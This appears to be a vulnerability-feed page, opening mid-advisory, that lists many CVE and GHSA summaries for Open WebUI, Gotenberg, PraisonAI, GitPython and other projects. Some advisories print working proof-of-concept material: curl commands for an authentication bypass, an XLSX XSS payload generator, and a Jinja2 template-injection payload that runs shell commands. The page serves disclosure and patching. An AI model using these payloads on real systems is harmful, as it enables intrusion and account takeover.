auth_token.credentials.startswith("sk-"): return get_current_user_by_api_key(auth_token.credentials) # auth by jwt token data = decode_token(auth_token.credentials) if data != None and "id" in data: user = Users.get_user_by_id(data["id"]) if user is None: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.INVALID_TOKEN, ) return user else: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.UNAUTHORIZED, ) ``` As shown above, this logic does not verify the role of the user, the function simples checks if the JWT is valid. --- ## 12. Proof-of-Concept First, verify that an unauthenticated user receives `{"detail":"401 Unauthorized"}`: ```bash curl -s -X $'GET' \ -H $'Host: openwebui.example.com' \ -H $'Content-Type: application/json' \ $'https://openwebui.example.com/ollama/api/tags' ``` The above curl command will return: `{"detail":"401 Unauthorized"}` as no Authorization Bearer token is provided. Now to access the authentication endpoint, two calls will be made. The first cURL creates an account and sets the `$JWT` environment variable which will be utilized in the subsequent cURL command. ```bash export JWT=$(curl -s -X POST \ -H 'Host: openwebui.example.com' -H 'Content-Length: 60' \ -H 'Content-Type: application/json' \ --data '{"name":"","email":"bad_guy@korelogic.com","password":"a"}' \ 'https://openwebui.example.com/api/v1/auths/signup' | jq '.token'|tr -d '"') curl -v $'GET' \ -H $'Host: openwebui.example.com' \ -H $'Content-Type: application/json' \ -H $'Authorization: Bearer ${JWT}' -H $'Content-Length: 2' \ --data-binary $'\x0d\x0a' \ $'https://openwebui.example.com/ollama/api/tags' ``` Additionally the `"role":"pending"` value in the HTTP response can be forged from `POST /api/v1/auths/signin` and `GET /api/v1/auths/` to utilize the full website. This can be achieved with a man-in-the-middle proxy such as Burp or Zap and modifying `pending` to `user`. --- ## 13. Mitigation Recommendation The application currently has a function for checking if the user is authorized. However, it is not being utilized except for one endpoint. See <https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L110-L116> for the correct function to use. ```python def get_verified_user(user=Depends(get_current_user)): if user.role not in {"user", "admin"}: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) return user ``` Modify all authenticated endpoints to utilize `get_verified_user()` function instead of `get_current_user()`.

Authentication Bypass Python Debian
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

### Summary Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger. ### Details The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133 XLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected. https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400 ### PoC A python script to generate a payload file is as follows: ```python import xlsxwriter payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">' workbook = xlsxwriter.Workbook('xss_payload.xlsx') worksheet = workbook.add_worksheet() payload_format = workbook.add_format() worksheet.write_rich_string('A1', 'This cell contains a hidden payload: ', payload_format, payload ) worksheet.write('A2', 'This is a safe cell.') worksheet.write('B1', 'Column B') workbook.close() ``` Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers. <img width="2444" height="1386" alt="image" src="https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f" /> This same process can be triggered in shared chats, allowing the payload to be distributed to victims. <img width="2386" height="1646" alt="image" src="https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3" /> ### Impact Any user can create a weaponised chat that can be shared and subsequently used to target other users. Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server. Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch. ### Caveats The file attachment in the shared chat must be opened and previewed to trigger the vulnerability. ### Recommendation Sanitise the generated HTML with DOMPurify before assigning it to the DOM.

XSS Python
NVD GitHub VulDB
EPSS 0% CVSS 3.8
LOW Monitor

SysReptor is a fully customizable pentest reporting platform. Prior to version 2026.29, users with "User Admin" permissions can change the email addresses of users with "Superuser" permissions. If the SysReptor installation has the "Forgot Password" functionality enabled (non-default), they can reset the Superusers' passwords and authenticate, if the Superuser has no MFA enabled. User managers can then access the Django backend (/admin) or manipulate the settings of the SysReptor installation. Note that user managers have the ability to access all pentest projects by assigning themselves "Project Admin" permissions. This is intentional and by design. This issue has been patched in version 2026.29.

Privilege Escalation Python
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

## Summary `banks <= 2.4.1` uses `jinja2.Environment()` (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to `Prompt()` are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This is a vulnerability in how `banks` initializes its Jinja2 environment - not in Jinja2 itself. ## Vulnerable Code `src/banks/env.py` - the global Jinja2 environment is created without sandboxing: ```python env = Environment( autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False), ... ) ``` ## Attack Scenario An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to `Prompt()` is vulnerable. For example: ```python # User-controlled input reaches Prompt() user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(user_input) p.text() # Executes arbitrary command on the host ``` ## Proof of Concept **Setup:** ```bash pip install banks==2.4.1 ``` **PoC script:** ```python from banks import Prompt payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(payload) result = p.text() print(f"[+] Output: {result}") ``` **Confirmed output:** ``` [+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),... text **File-write proof:** ```python from banks import Prompt p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}") p.text() ``` ```bash ls -l /tmp/rce_banks_exec # -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec ``` ## Impact Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise. ## Fix Fixed in `banks 2.4.2` (PR #74) by switching to `jinja2.sandbox.SandboxedEnvironment`, which blocks the dunder attribute traversal chain this exploit relies on. Developers on `banks <= 2.4.1` should upgrade to `2.4.2` and avoid passing untrusted user input as the template argument to `Prompt()`. ## Resources - Fix: https://github.com/masci/banks/pull/74 - CVE-2024-41950 (Haystack - identical root cause, CVSS 7.5) - CVE-2025-25362 (spacy-llm - identical root cause) - CWE-1336: Improper Neutralization of Special Elements in a Template Engine

Python RCE Ssti
NVD GitHub VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

# Deactivated Channel Members Retain Full Access to Group/DM Channels ## Affected Component Channel membership authorization check: - `backend/open_webui/models/channels.py` (lines 663-673, `is_user_channel_member`) - Used at 15 locations in `backend/open_webui/routers/channels.py` ## Affected Versions Current main branch (commit `6fdd19bf1`) and likely all versions with the group/DM channel feature. ## Description The `is_user_channel_member` function checks whether a `ChannelMember` row exists but does not check the `is_active` field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with `is_active=False` and `status='left'`. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. The channel correctly disappears from the deactivated user's channel list (the listing query at `get_channels_by_user_id` properly filters on `is_active`), but all 15 message-level endpoints in the router rely on `is_user_channel_member` for authorization, which does not filter on `is_active`. ```python # models/channels.py:663 - missing is_active check def is_user_channel_member(self, channel_id, user_id, db=None): membership = db.query(ChannelMember).filter( ChannelMember.channel_id == channel_id, ChannelMember.user_id == user_id, ).first() return membership is not None # True even when is_active=False ``` Compare with `get_channel_by_id_and_user_id` (line 778) which correctly checks `ChannelMember.is_active.is_(True)`. ## CVSS 3.1 Breakdown | Metric | Value | Rationale | |--------|-------|-----------| | Attack Vector | Network (N) | Exploited remotely via API calls | | Attack Complexity | Low (L) | No special conditions beyond knowing the channel ID (which the user had as a former member) | | Privileges Required | Low (L) | Requires a valid user account and prior channel membership | | User Interaction | None (N) | No victim interaction required | | Scope | Unchanged (U) | Impact is within the same authorization boundary (the channel) | | Confidentiality | Low (L) | Can read messages in a channel the user should no longer access | | Integrity | Low (L) | Can post, edit, and delete messages in the channel | | Availability | None (N) | No denial of service | ## Attack Scenario 1. User A and User B are members of a private group channel. 2. The channel owner removes User B (or User B leaves). User B's membership is set to `is_active=False, status='left'`. 3. The channel disappears from User B's UI - but User B noted the channel ID while they were a member. 4. User B calls the API directly: - `GET /api/v1/channels/{channel_id}/messages` - reads all messages, including those posted after deactivation - `POST /api/v1/channels/{channel_id}/messages/post` - posts new messages - `POST /api/v1/channels/{channel_id}/messages/{id}/update` - edits messages - `DELETE /api/v1/channels/{channel_id}/messages/{id}/delete` - deletes messages 5. All requests succeed because `is_user_channel_member` returns `True`. ## Impact - Deactivated users can continue reading all new messages posted after their removal (confidentiality breach) - Deactivated users can post, edit, and delete messages (integrity breach) - The deactivation mechanism provides a false sense of security - channel owners believe removed users have lost access ## Preconditions - Channels feature must be enabled (disabled by default) - Attacker must have a valid user account - Attacker must have been a member of the channel at some point (and thus knows the channel ID) ## Recommended Fix Add `is_active` filtering to `is_user_channel_member`: ```python def is_user_channel_member(self, channel_id, user_id, db=None): membership = db.query(ChannelMember).filter( ChannelMember.channel_id == channel_id, ChannelMember.user_id == user_id, ChannelMember.is_active.is_(True), ).first() return membership is not None ``` This aligns it with the existing `get_channel_by_id_and_user_id` method which already applies this filter correctly.

Authentication Bypass Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Read-only users in Open WebUI can modify collaborative documents via Socket.IO by emitting crafted `ydoc:document:update` events that bypass write permission checks, allowing them to inject, modify, or delete content visible to all collaborators in real time. While direct database persistence requires write access, tampered content becomes permanent if any write-enabled user saves the document, undermining the read/write permission model for collaborative editing.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Open WebUI Ollama proxy endpoints bypass model access control checks, allowing authenticated users to access restricted models and expose sensitive configuration. Four endpoints (/api/generate, /api/embed, /api/embeddings, /api/show) fail to validate AccessGrants permissions before forwarding requests to the Ollama backend, despite the /api/chat endpoint implementing proper authorization checks. Attackers with any valid user account can consume GPU resources on restricted models and view sensitive details like system prompts by directly calling unprotected endpoints with known model names.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Open WebUI's POST /api/v1/models/import endpoint allows authenticated users with workspace.models_import permission to overwrite any existing model in the database without ownership validation, silently replacing system prompts, base model routing, and access grants. This enables a low-privilege user to hijack organization-wide models and inject malicious behavior affecting all downstream queries. The vulnerability bypasses access grant restrictions enforced on all other model mutation endpoints by never calling filter_allowed_access_grants.

Authentication Bypass Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Open WebUI versions up to 0.8.12 allow authenticated users to enumerate members of private standard channels via the GET /api/v1/channels/{id}/members endpoint, which lacks access control checks present on other channel endpoints. An attacker who knows a private channel's UUID can retrieve the full list of members including their names, emails, roles, and profile images, enabling targeted social engineering and organizational structure reconnaissance. The vulnerability is fixed in version 0.9.0.

Authentication Bypass Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Open WebUI versions up to 0.8.12 allow authenticated users to enumerate all knowledge bases across the instance via an incomplete access control allowlist in the retrieval collection validation function. The `_validate_collection_access` function only enforces ownership checks for collections matching `user-memory-*` and `file-*` patterns, allowing any authenticated user to directly query the system-level `knowledge-bases` meta-collection and retrieve the IDs, names, and descriptions of every knowledge base regardless of ownership. This information disclosure vulnerability serves as an enabler for subsequent attacks including knowledge base destruction and content injection, transforming these attacks from theoretically exploitable (requiring random UUID guessing) to trivially exploitable (UUIDs enumerable). CVSS score 4.3 (network-accessible, low privilege required, low confidentiality impact). Patched in version 0.9.0.

Python Denial Of Service Information Disclosure
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Open WebUI through version 0.8.12 allows authenticated attackers to destroy or poison any user's knowledge base via unauthorized collection overwrite operations. The `/api/v1/retrieval/process/web` endpoint fails to verify collection ownership before performing delete-and-replace operations on vector database collections. This enables attackers to permanently delete victim knowledge bases and inject malicious content that influences LLM responses through RAG poisoning. No public exploit identified at time of analysis, but proof-of-concept code is documented in the GitHub advisory GHSA-7r82-qhg4-6wvj. Vendor-released patch: version 0.9.0.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Open WebUI versions up to 0.8.12 allow authenticated users to bypass channel access control restrictions by directly persisting arbitrary access grants without applying the `filter_allowed_access_grants()` validation used consistently across other resource types. An attacker with channel creation or ownership privileges can grant public read access (via wildcard principal grants) or individual user access, circumventing admin-configured sharing permission policies. This affects installations where administrators restrict public sharing or user-grant capabilities to specific roles.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Authenticated users can bypass model access controls in Open WebUI ≤0.8.12 to invoke restricted AI models via chained base_model_id references. Any user with default model creation permissions can create a wrapper model referencing a restricted base model (e.g., gpt-4-turbo with admin-only access), then query it to consume the admin's API credits and access premium model capabilities. This vulnerability enables cost escalation on pay-per-token backends (OpenAI, Anthropic, Azure) and defeats tiered access policies. GitHub advisory confirmed; patched in version 0.9.0. No active exploitation confirmed per available intelligence, but the attack path is straightforward for authenticated users with standard permissions.

Authentication Bypass Python Microsoft
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Cross-instance cache poisoning in Open WebUI allows administrators on one instance to inject malicious tool server configurations into shared Redis cache, affecting users on other instances. The vulnerability stems from missing Redis key prefixes on tool_servers and terminal_servers cache entries in backend/open_webui/utils/tools.py. When multiple Open WebUI instances share a Redis backend (a documented multi-region/blue-green deployment pattern), an admin on Instance A can configure a malicious tool server that overwrites Instance B's cache, causing Instance B users to send tool call payloads-containing chat content, user identity, and OAuth tokens-to attacker-controlled servers. Exploitation requires privileged access (CVSS PR:H) but crosses instance boundaries (Scope:Changed), enabling data exfiltration and prompt injection delivery. Vendor-released patch: version 0.9.0 addresses the missing prefix issue.

Redis Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Privilege escalation in Open WebUI ≤0.8.12 allows demoted administrators to retain elevated access to collaborative documents via stale Socket.IO sessions. When an admin user is demoted or deleted, their active WebSocket connection preserves cached admin privileges indefinitely through heartbeat mechanisms, enabling unauthorized read/write access to any user's notes. Official patch released in version 0.9.0 addresses the session invalidation gap. CVSS 8.1 (High) with network attack vector and low complexity; no public exploit identified at time of analysis.

Authentication Bypass Python Session Fixation
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

Mass assignment vulnerability in Open WebUI's folder creation endpoint allows authenticated attackers to create folders in other users' accounts by exploiting Pydantic's extra='allow' configuration. An attacker with a valid account can supply an arbitrary user_id in the POST request body, overwriting the server-assigned value and persisting folders under a victim's account without their knowledge. The attacker can use this to plant phishing content, spam folders, or degrade user experience for targeted victims.

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL POC PATCH Act Now

Remote authentication bypass in Open WebUI LDAP integration (versions ≤0.8.12) allows complete account takeover by submitting empty passwords. The vulnerability exploits RFC 4513 unauthenticated simple bind semantics: when LDAP is enabled, attackers can authenticate as any user-including administrators-with zero knowledge of actual passwords, gaining full access to chats, files, API keys, and settings. Affects deployments using OpenLDAP default configurations or certain Active Directory setups that accept empty-password binds. Vendor-released patch: version 0.9.0. CVSS 9.1 (Critical) reflects network-accessible, zero-privilege, zero-interaction exploitation with high confidentiality and integrity impact.

Authentication Bypass Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Bugsink versions 2.1.2 and earlier contain a webhook URL validation bypass (SSRF) where malformed URLs with backslashes and @ symbols pass validation checks but are interpreted differently by Python's urllib parser versus the requests HTTP client, allowing attackers with webhook configuration access to direct outbound POST requests to blocked hosts including loopback and private addresses. The vulnerability is narrower than full SSRF because requests do not follow redirects, the request shape is constrained by URL normalization, and this only affects webhook integrations, not arbitrary outbound proxying.

Python SSRF
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Remote code execution in SiYuan's Electron renderer occurs when users hover over search results, file tree items, or attribute view elements containing URL-encoded XSS payloads in document titles or metadata. The vulnerability chains a URL-decoding step (decodeURIComponent) with unsafe innerHTML assignment in tooltip rendering, bypassing the escapeAriaLabel sanitizer that only handles HTML entities but ignores %XX URL escapes. Because SiYuan's renderer runs with nodeIntegration:true and contextIsolation:false, the XSS escalates to arbitrary code execution via require('child_process'). Exploitation requires user interaction (hovering) but no authentication, and malicious payloads survive .sy.zip export/import and sync replication, enabling supply-chain and shared-workspace attacks. No public exploit code identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.

Microsoft XSS Python +4
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Stored cross-site scripting in Open WebUI versions 0.3.5 through 0.8.12 allows authenticated users with model creation permission to inject malicious JavaScript via markdown-link payloads in model descriptions. Attackers craft markdown links with javascript: URIs (e.g., [text](javascript:alert())) that bypass sanitization, are parsed into executable anchor tags by marked.parse(), and rendered unsafely via Svelte's {@html} directive. Successful exploitation enables session token theft from localStorage and full account takeover of admins and other users who view the malicious model in the chat UI. This represents a pipeline-ordering flaw distinct from CVE-2024-7990, which exploited a video-tag restoration logic removed in v0.4.0. Fix confirmed in v0.9.0 (commit 5eab125) via DOMPurify post-processing. EPSS data not provided; CVSS 7.3 reflects network attack vector with low complexity but required authentication and user interaction, limiting automated exploitation.

XSS RCE Python
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC PATCH This Week

Remote unauthenticated access to PraisonAI's legacy Flask API server allows attackers to execute configured agent workflows without authentication. Versions 2.5.6 through 4.6.33 ship with authentication disabled by default on the Flask server, enabling any network-accessible caller to trigger agents.yaml workflows via the /chat endpoint and access agent configurations through /agents. Patch released in version 4.6.34. CVSS 7.3 with network vector and no privileges required (AV:N/AC:L/PR:N/UI:N) indicates this is remotely exploitable against default configurations, though impact is limited to low confidentiality, integrity, and availability (C:L/I:L/A:L).

Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Arbitrary file write in PraisonAI's MCP server escalates to remote code execution through path traversal when user interaction triggers malicious tool calls. The praisonai mcp serve daemon accepts attacker-controlled path arguments without validation, allowing writes outside the intended ~/.praison/rules/ directory. Attackers can drop Python .pth files into site-packages to achieve code execution in any subsequent Python process run by the victim user. CVSS 9.4 with network vector and low complexity, though exploitation requires user interaction (PR:N/UI:P). No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis, but the detailed advisory provides sufficient information for weaponization.

Python RCE
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Command injection in PraisonAI's MCP server command handler enables remote unauthenticated attackers to execute arbitrary operating system commands. The vulnerability exists in parse_mcp_command() which accepts MCP server commands without validating executables or arguments, allowing injection of shell commands like 'bash -c', 'python -c', or '/bin/sh -c' with inline code execution. GitHub security advisory GHSA-9qhq-v63v-fv3j confirms this is an incomplete fix for CVE-2026-34935. Vendor-released patch version 4.6.9 (upstream version 1.5.69) implements an allowlist of permitted MCP executables and validates commands against ALLOWED_MCP_COMMANDS. No active exploitation confirmed (not in CISA KEV); proof-of-concept exploit code published in advisory demonstrates trivial exploitation.

Python Command Injection RCE
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Path traversal in Microsoft APM CLI 0.8.11 and earlier allows malicious plugins to copy arbitrary readable host files into managed project directories during installation. The plugin_parser.py module fails to validate that component paths in plugin.json manifest fields (agents, skills, commands, hooks) remain within the plugin root, enabling attackers to use absolute paths or ../ traversal sequences to exfiltrate local files. Verified proof-of-concept demonstrates a malicious plugin copying external markdown files into .github/prompts/ through the auto-integration pipeline. Exploitation requires user interaction (installing a malicious plugin), but no authentication is required once the user initiates installation. CVSS 7.1 (High) reflects significant confidentiality and integrity impact in a local supply-chain attack scenario. Vendor-released patch available in apm-cli 0.8.12 per GitHub advisory GHSA-xhrw-5qxx-jpwr. No active exploitation (CISA KEV) confirmed, but publicly available exploit code exists with complete proof-of-concept including runnable scripts.

Python Microsoft Path Traversal
NVD GitHub
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

JWT secret validation bypass in Note Mark allows full account takeover through offline token forgery. The Go-based note-taking application accepts HS256 signing secrets shorter than RFC 7518's required 32 bytes, enabling attackers to capture a single valid JWT from network traffic or logs, brute-force the weak secret offline, and forge authentication tokens for any user including administrators. Publicly available exploit code exists (vendor-published PoC in GitHub advisory GHSA-q6mh-rqwh-g786). Vendor-released patch available in commit 18b587758667 and release v0.19.4. CVSS 10.0 reflects unauthenticated network exploitation with scope change, though real-world impact requires JWT capture as a prerequisite.

Python RCE
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM This Month

FacturaScripts fails to strip EXIF and metadata from user-uploaded images in the Library module, allowing any authenticated user with download access to extract GPS coordinates, device information, timestamps, author names, and other personally identifiable information from downloaded files. An employee uploading a photo taken at their home inadvertently discloses their precise home address to all users with Library access. This affects all image uploads retroactively, with no patched version currently available.

Microsoft PHP File Upload +4
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Remote code execution in GitPython < 3.1.47 allows unauthenticated network attackers to inject malicious Git configuration during repository clone operations via crafted multi_options arguments. The _clone() method validates options before shlex.split transformation, enabling attackers to bypass unsafe option checks by embedding commands like '--config core.hooksPath=/attacker/path' within '--branch' strings. Git then executes attacker-controlled hooks during clone. Vendor-released patch available in version 3.1.47. CVSS 8.1 with high attack complexity; no EPSS or KEV data available, but public exploit code exists per GitHub security advisory GHSA-x2qx-6953-8485.

Python Information Disclosure Suse
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Command injection in GitPython 3.1.30-3.1.46 allows remote authenticated attackers to execute arbitrary commands via underscore-formatted kwargs that bypass unsafe option validation. Applications passing attacker-controlled kwargs to Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push() are vulnerable even when allow_unsafe_options=False (default). GitHub-confirmed exploit with vendor-released patch 3.1.47. CVSS 8.8 reflects network vector with low complexity and authenticated access; no EPSS/KEV data indicates exploitation not yet widespread beyond proof-of-concept demonstration.

Python Command Injection Suse
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

BentoML's `bentoml build` command dereferences symlinks within the build context and copies their target file contents into the generated Bento artifact, allowing attackers to exfiltrate sensitive files from the build host. An attacker who controls a repository or build context can place symlinks pointing to sensitive local files (credentials, SSH keys, API tokens), and when a developer or CI system runs `bentoml build`, the referenced file contents are packaged into the Bento, which may then be exported, pushed, or containerized, spreading the leaked data. Publicly available exploit code demonstrates successful extraction of files outside the build directory. Affected versions through BentoML 1.4.38; patch released in 1.4.39.

Python Path Traversal
NVD GitHub
EPSS 0% CVSS 9.2
CRITICAL Act Now

Server-Side Template Injection in Open Notebook v1.8.3 enables arbitrary Python code execution and OS command execution within the Docker container through unsanitized user input in transformation features. The vulnerability requires local access (CVSS AV:L) but no authentication or user interaction, making it exploitable by any application user with access to the transformation creation interface. No public exploit code identified at time of analysis, though the GitHub security advisory provides technical details for reproduction.

Python Docker Code Injection
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Cross-tenant Insecure Direct Object Reference (IDOR) in Aegra 0.9.0-0.9.6 allows any authenticated user to execute graph runs against other users' threads, exfiltrate full checkpoint state including conversation histories, and inject malicious messages into victims' threads by supplying known thread UUIDs to POST /threads/{thread_id}/runs endpoints. Thread IDs leak through frontend URLs, server logs, and observability traces, eliminating need for enumeration. Vendor-released patch (v0.9.7) confirmed by GitHub advisory GHSA-m98r-6667-4wq7. No active exploitation or POC identified at time of analysis, though detailed reproducer exists in issue #336.

Authentication Bypass Checkpoint Python
NVD GitHub VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Cross-host HTTP redirects in Microsoft Kiota HTTP client libraries leak session cookies, proxy credentials, and custom authentication headers to attacker-controlled domains. When Kiota's RedirectHandler middleware follows 3xx redirects to different hosts (e.g., trusted.example.com → evil.attacker.com), it strips the Authorization header but forwards Cookie, Proxy-Authorization, and all custom headers unchanged. Publicly available exploit code exists with a complete proof-of-concept demonstrating cookie exfiltration to malicious redirect targets. This affects all Kiota language implementations (Java, .NET, Python, TypeScript, Go) and downstream consumers including Microsoft Graph SDK for Java. The vulnerability requires user interaction to trigger the initial API request, but once triggered, credential leakage is automatic on cross-origin redirects (CVSS:4.0 AV:N/AC:L/AT:P/PR:N/UI:P). Vendor-released patches are available across all affected package ecosystems.

Python Microsoft Java +1
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Gotenberg versions 8.31.0 and earlier allow unauthenticated remote attackers to enumerate and read arbitrary files under /tmp/ via the /forms/chromium/convert/url and /forms/chromium/screenshot/url endpoints using file:// scheme URLs. An attacker can discover in-flight conversion request directories and exfiltrate source files (HTML, Markdown, Office documents, staged PDFs) from other users' concurrent conversion requests by timing attacks to coincide with long-running conversion operations. The vulnerability exploits a logic flaw where the URL routes fail to set per-request scope guards that HTML/Markdown routes correctly apply, causing file:// access control enforcement to silently skip for URL-based conversions.

Microsoft Python RCE +2
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Unauthenticated server-side request forgery (SSRF) in Gotenberg 8.30.1 and earlier allows remote attackers to force the server to make HTTP requests to internal/loopback addresses by bypassing default deny-lists with IPv4-mapped IPv6 notation (e.g., http://[::ffff:127.0.0.1]:port). The vulnerability affects both the downloadFrom file-fetching feature and the webhook delivery feature. Attackers can read content from internal HTTP endpoints and trigger state-changing requests against services bound to localhost, exposing internal APIs, cloud metadata endpoints, and admin interfaces. Fix available in version 8.32.0. No public exploit code confirmed outside the GitHub advisory PoC, not listed in CISA KEV, but CVSS 9.4 Critical rating reflects the network-accessible, unauthenticated nature and high confidentiality/integrity impact.

SSRF Microsoft Python +2
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unauthenticated remote attackers crash Gotenberg 8.x (≤ 8.31.0) by triggering a race condition between webhook goroutine context reuse and Echo framework connection pooling. When webhook middleware spawns an async goroutine holding an `echo.Context` reference, the synchronous handler returns immediately, recycling the context to Echo's `sync.Pool`. Concurrent requests reset the pooled context, causing unchecked type assertions in the still-running webhook goroutine to panic outside any `recover()` scope, terminating the process with exit code 2. Twenty-four webhook requests plus sixty concurrent GET requests demonstrate reliable two-second crash windows. No patch was available at initial disclosure; upstream commit fixes the panic in version 8.32.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects trivial unauthenticated network exploitation producing complete service disruption.

Kubernetes Denial Of Service Python +3
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.

Microsoft Python Oracle +3
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

DNS rebinding vulnerability in Gotenberg allows unauthenticated remote attackers to bypass SSRF protections and access internal services via Chromium URL conversion routes. When a URL is submitted for PDF conversion, Gotenberg validates the resolved IP address against a deny-list but discards the pinned result. Chromium then performs independent DNS resolution multiple times, creating a race condition where an attacker controlling DNS can return a public IP during validation and a private IP during connection, allowing access to loopback services, cloud metadata endpoints, or internal networks. Exploitation succeeds approximately 10% per attempt with trivial automation.

Python Docker Information Disclosure +1
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Act Now

Unauthenticated remote code execution in Gotenberg 8.29.1 allows network attackers to execute arbitrary OS commands via newline injection in PDF metadata keys. The `/forms/pdfengines/metadata/write` endpoint passes user-controlled JSON metadata keys directly to ExifTool without control-character validation. Embedding `\n` in a key splits ExifTool's stdin stream, injecting arbitrary flags including `-if` which evaluates Perl expressions. Attack returns HTTP 200 with valid PDF output, evading basic monitoring. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) reflects critical network-accessible RCE. No vendor-released patch identified at time of analysis — GitHub advisory GHSA-rqgh-gxv4-6657 confirms the issue but CPE data shows no fixed version. Publicly available exploit code exists in Python and bash with OOB exfiltration. Default Docker image `gotenberg/gotenberg:8` runs the vulnerable process as uid 1001 with root group membership, amplifying post-exploitation impact.

Command Injection Python RCE +2
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

